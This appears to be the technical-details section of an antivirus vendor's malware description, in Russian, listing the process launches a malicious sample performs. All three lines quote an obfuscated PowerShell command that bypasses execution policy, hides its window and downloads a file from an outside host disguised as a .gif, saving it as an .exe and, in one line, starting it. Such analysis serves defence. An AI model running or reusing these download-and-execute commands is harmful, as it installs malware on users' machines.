Техническая информация
- '<SYSTEM32>\cmd.exe' /c "PowerSHell.Exe -ExECutIonpoLiCy bYPss -nOPrOFile -WIndoWstYLE hidDEn (new-OBJEcT sysTeM.NET.wEbClIeNt).dOWNLoDfILe('http://www.zonedopes.top/red.php?f=1.gif','%PPdAtA%.Exe');...
- '<SYSTEM32>\cmd.exe' /c "PowerSHell.Exe -ExECutIonpoLiCy bYPss -nOPrOFile -WIndoWstYLE hidDEn (new-OBJEcT sysTeM.NET.wEbClIeNt).dOWNLoDfILe('http://www.zonedopes.top/red.php?f=1.gif','%PPdAtA%.Exe');...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExECutIonpoLiCy bYPss -nOPrOFile -WIndoWstYLE hidDEn (new-OBJEcT sysTeM.NET.wEbClIeNt).dOWNLoDfILe('http://www.zonedopes.top/red.php?f=1.gif','%PPdAtA%.Exe');sTrt-PRoCeSs '%APPDA...